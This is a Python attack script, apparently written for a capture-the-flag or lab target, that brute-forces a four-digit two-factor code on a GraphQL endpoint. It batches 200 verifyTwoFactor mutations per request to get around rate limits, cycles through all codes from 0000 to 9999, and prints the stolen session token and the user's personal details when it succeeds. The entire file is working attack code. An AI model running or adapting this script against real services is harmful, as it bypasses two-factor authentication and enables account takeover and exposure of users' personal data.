import time
import requests
import json

# Target GraphQL endpoint
url = "http://<ip>:<port>/graphql"

# The 2FA session token obtained from devForgotPassword
token = ""

# HTTP headers needed by the server to accept the request
headers = {
    "Authorization": "",
    "Accept-Language": "en-US,en;q=0.8",
    "User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6863.88 Safari/537.36",
    "Content-Type": "application/json",
    "Origin": "http://<ip>:<port>/",
    "Referer": "http://<ip>:<port>/",
}

# GraphQL mutation used by each OTP attempt
query = """
mutation VerifyTwoFactor($token: String!, $otp: String!) {
  verifyTwoFactor(token: $token, otp: $otp) {
    token
    user {
      id
      email
      firstName
      lastName
      address
      phoneNumber
      twoFactorAuthEnabled
    }
  }
}
"""


def build_batch(start, end):
    """
    Build a batch (array) of GraphQL requests.

    Each item is one OTP attempt.
    OTP is padded to 4 digits ("%04d" → 0000..9999).
    """
    return [{
        "query": query,
        "variables": {
            "token": token,
            "otp": f"{i:04d}"   # Zero-padded OTP
        }
    } for i in range(start, end)]


# Outer loop: brute-force OTPs from 0000 to 9999 in steps of 200 requests.
for i in range(0, 10000, 200):

    # Delay 1 second between batches to avoid rate-limits
    time.sleep(1)

    print(f"[*] Sending batch {i:04d} - {i+199:04d}")

    # Build JSON payload with 200 OTP attempts in one POST
    payload = build_batch(i, i+200)

    # Send the POST request containing 200 GraphQL mutations
    response = requests.post(url, headers=headers, json=payload)

    try:
        # Expecting server to return a JSON list of results (one per OTP)
        results = response.json()

    except Exception as e:
        # If server returned something non-JSON, print raw body
        print(f"[!] JSON decode error: {e}")
        print(response.text)
        continue  # Move to next batch

    # Iterate through all 200 responses inside this batch
    for idx, item in enumerate(results):

        # Reconstruct the OTP we just tried
        path = f"{i + idx:04d}"

        try:
            # Extract the GraphQL response structure
            data = item.get("data", {})
            result = data.get("verifyTwoFactor", None)

            # If "verifyTwoFactor" exists → OTP was correct
            if result and isinstance(result, dict) and "token" in result:
                print(f"[+] VALID OTP FOUND: {path}")
                print("[+] Token:", result["token"])
                print(json.dumps(item, indent=2))
                exit(0)

        except Exception as e:
            # If something unexpected appears inside a response item
            print(f"[!] Error at {path}: {e}")
            print(json.dumps(item, indent=2))

# If loop finishes without success:
print("[-] No valid OTP found.")